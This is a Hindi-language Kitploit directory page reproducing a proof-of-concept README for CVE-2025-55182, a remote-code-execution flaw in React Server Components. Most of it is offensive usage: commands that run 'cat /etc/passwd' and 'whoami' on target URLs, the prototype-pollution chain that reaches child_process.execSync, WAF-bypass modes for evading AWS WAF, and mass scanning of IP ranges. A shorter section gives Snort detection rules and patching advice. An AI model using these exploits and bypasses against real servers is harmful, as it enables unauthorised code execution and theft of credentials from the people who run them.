Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-POC — CVE-2025-55182-POC | Kitploit
उपकरण/GitHubGitHub/zxz3650/cve-2025-55182-poc
Vulnerability AnalysisExploitationIDS/IPS EvasionWeb Application ExploitationWAF BypassPenetration TestingPayload Development
GitHubzxz3650/cve-2025-55182-poc

CVE-2025-55182-POC

CVE-2025-55182-POC

रिपॉजिटरी देखें
18 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 POC & Detection

React Server Components (RSC) असुरक्षित डिसीरियलाइज़ेशन कमजोरी शोषण और पता लगाने के उपकरण संग्रह

भेद्यता जानकारी

  • CVE-ID: CVE-2025-55182
  • प्रभावित संस्करण: React 19.x, Next.js 15.x/16.x (App Router उपयोग पर)
  • हमला वेक्टर: RSC Flight प्रोटोकॉल डिसीरियलाइज़ेशन पर प्रोटोटाइप प्रदूषण के माध्यम से RCE
  • जोखिम स्तर: Critical (CVSS 10.0)

📦 घटक

1. कमजोर वातावरण (Docker)

  • docker-compose.yml - Next.js 15.0.3 + React 19.0.0-rc
  • vulnerable-app/ - कमजोर Server Action कोड

2. शोषण उपकरण

  • exploit_advanced.py - बहु-हमला तकनीक समर्थन (Basic/Advanced/Chunked/Oversize)

3. भेद्यता स्कैनर

  • rsc_vulnerability_checker_multi.py - मल्टी-टारगेट भेद्यता निदान उपकरण

4. IDS पहचान नियम

  • rules_priority_based - Snort प्राथमिकता-आधारित पहचान नियम सेट

🚀 Quick Start

1. कमजोर वातावरण स्थापित करें

root@kitploit:~
cd vulnerable-app
docker-compose up -d
# http://localhost:3000 तक पहुंच की पुष्टि करें

2. भेद्यता निदान

root@kitploit:~
# एकल URL परीक्षण
python3 rsc_vulnerability_checker_multi.py http://localhost:3000

# एकाधिक URL बैच स्कैन
python3 rsc_vulnerability_checker_multi.py http://site1.com http://site2.com

# IP रेंज स्कैन
python3 rsc_vulnerability_checker_multi.py -r 192.168.1.1-254 -p 3000 --threads 20

# फ़ाइल से पढ़ें
python3 rsc_vulnerability_checker_multi.py -f targets.txt -o results.csv

3. शोषण निष्पादित करें

root@kitploit:~
# मूल हमला
python3 exploit_advanced.py -u http://localhost:3000 -c "whoami" --basic

# उन्नत हमला (प्रोटोटाइप चेन + thenable)
python3 exploit_advanced.py -u http://localhost:3000 -c "id" --advanced

# WAF बाईपास - Unicode एन्कोडिंग
python3 exploit_advanced.py -u http://target.com -c "cat /etc/passwd" --advanced --waf-bypass

# WAF बाईपास - Chunked Transfer Encoding
python3 exploit_advanced.py -u http://target.com -c "uname -a" --chunked

# WAF बाईपास - Oversize Payload (AWS WAF)
python3 exploit_advanced.py -u http://target.com -c "id" --oversize 65536

# सभी तकनीकों को क्रमिक रूप से आज़माएं
python3 exploit_advanced.py -u http://target.com -c "whoami" --all -v

4. नेटवर्क पहचान परीक्षण

root@kitploit:~
# हमले के ट्रैफ़िक को कैप्चर करें
sudo tcpdump -i lo0 -w attack.pcap 'port 3000' &
python3 exploit_advanced.py -u http://localhost:3000 -c "id" --all
sudo pkill tcpdump

# Snort के साथ विश्लेषण
snort -c snort.conf -r attack.pcap -A console -k none

शोषण तकनीक विवरण

Basic Mode

सीधे RSC Flight पेलोड भेजें

root@kitploit:~
# Server Action को सीधे कॉल करें
POST /?__rsc_action__ HTTP/1.1
Content-Type: text/plain
next-action: <action_id>

["$@1",["$","$L2",null,{...}]]

Advanced Mode

प्रोटोटाइप प्रदूषण (Prototype Pollution) का उपयोग कर RCE

root@kitploit:~
// मूल सिद्धांत
{
  "then": "$1:__proto__:then",           // Chunk.prototype.then ट्रिगर करें
  "_response": {                          // नकली प्रतिक्रिया इंजेक्ट करें
    "_formData": {...},
    "_prefix": ""
  },
  "$1:constructor:constructor": Function  // Function कंस्ट्रक्टर तक पहुंच
}

हमला श्रृंखला:

  1. __proto__ प्रदूषण के माध्यम से Chunk.prototype.then सेट करें
  2. _response ऑब्जेक्ट इंजेक्ट करके FormData को नियंत्रित करें
  3. $B हैंडलर response._formData.get(id) को कॉल करें
  4. constructor:constructor श्रृंखला के माध्यम से Function तक पहुंचें
  5. process.mainModule.require('child_process').execSync(cmd) निष्पादित करें

Chunked Mode

Transfer-Encoding का उपयोग कर पैटर्न को फैलाना

root@kitploit:~
POST /?__rsc_action__ HTTP/1.1
Transfer-Encoding: chunked

10
["$@1",["$","
15
$L2",null,{"then
...
  • WAF पैटर्न मिलान को बायपास करें (कीवर्ड विभाजन)
  • एकल बफर के रूप में जांचना असंभव

Oversize Mode

AWS WAF आकार सीमा को बायपास करें

root@kitploit:~
payload = original_payload + "X" * (size - len(original_payload))
# AWS WAF: केवल पहले 8KB की जांच करता है
# वास्तविक हमला कोड 8KB के बाद रखें

📊 पहचान नियम प्राथमिकता

P0 Rules (SID 2000xxx) - तुरंत ब्लॉक

  • process.mainModule.require + child_process + execSync
  • __proto__ + resolved_model + RCE मॉड्यूल
  • /etc/passwd, /etc/shadow, .ssh/id_rsa तक पहुंच

📋 आवश्यकताएँ

अनिवार्य

  • Docker और Docker Compose
  • Python 3.8+
  • requests लाइब्रेरी
    root@kitploit:~
    pip install requests
    

वैकल्पिक (पहचान परीक्षण के लिए)

  • Snort 2.9+
  • tcpdump

🔍 भेद्यता स्कैनर उपयोग

मूल उपयोग

root@kitploit:~
# एकल URL
python3 rsc_vulnerability_checker_multi.py http://target.com

# एकाधिक URL
python3 rsc_vulnerability_checker_multi.py http://site1.com http://site2.com

उन्नत उपयोग

root@kitploit:~
# IP रेंज स्कैन (CIDR)
python3 rsc_vulnerability_checker_multi.py -r 192.168.1.0/24 -p 3000

# IP रेंज स्कैन (हाइफ़न)
python3 rsc_vulnerability_checker_multi.py -r 10.0.0.1-254 -p 8080 --threads 50

# फ़ाइल इनपुट/आउटपुट
python3 rsc_vulnerability_checker_multi.py -f targets.txt -o scan_results.csv

# Verbose मोड
python3 rsc_vulnerability_checker_multi.py http://target.com -v

आउटपुट प्रारूप

root@kitploit:~
[VULNERABLE] http://target.com:3000 - React 19.0.0-rc, Next.js 15.0.3
[SAFE] http://example.com:3000 - असुरक्षित नहीं
[ERROR] http://offline.com:3000 - कनेक्शन टाइमआउट

🎯 शोषण उपकरण विकल्प

हमला मोड

  • --basic: सीधे RSC Flight पेलोड भेजें
  • --advanced: प्रोटोटाइप चेन + thenable तकनीक
  • --chunked: Transfer-Encoding विभाजन भेजें
  • --oversize <size>: Oversize पेलोड (डिफ़ॉल्ट: 65536 बाइट्स)
  • --all: सभी तकनीकों को क्रमिक रूप से आज़माएं

WAF बाईपास

  • --waf-bypass: Unicode एन्कोडिंग (constructor → \u0063onstructor)
  • --chunked: पैटर्न फैलाव व्यवस्था
  • --oversize: AWS WAF आकार सीमा बाईपास

अन्य

  • -v, --verbose: विस्तृत आउटपुट
  • -t, --timeout: अनुरोध टाइमआउट (डिफ़ॉल्ट: 10 सेकंड)

🛡 रक्षा और पहचान

एप्लिकेशन स्तर

  1. React 19.0.0-rc → 19.0.0 (स्थिर) में अपग्रेड करें
  2. Next.js 15.0.3 → 15.1.0+ में अपग्रेड करें
  3. Server Actions इनपुट सत्यापन को मजबूत करें
  4. experimental सुविधाओं को निष्क्रिय करें

नेटवर्क स्तर

  1. Snort नियम लागू करें (rules_priority_based)
  2. WAF नीतियाँ:
    • __proto__ कीवर्ड को ब्लॉक करें
    • process.mainModule.require पैटर्न को ब्लॉक करें
    • POST बॉडी आकार सीमित करें (< 1MB)
  3. Rate Limiting (Server Action अनुरोध सीमित करें)

निगरानी

root@kitploit:~
# Snort रीयल-टाइम निगरानी
snort -c snort.conf -i eth0 -A console

# लॉग फ़ाइल विश्लेषण
snort -c snort.conf -r network.pcap -A fast

यह पोस्ट केवल अनुसंधान/शिक्षा/निदान सत्यापन उद्देश्यों के लिए है, अन्यथा इसका उपयोग न करें।

टूल डाउनलोड करें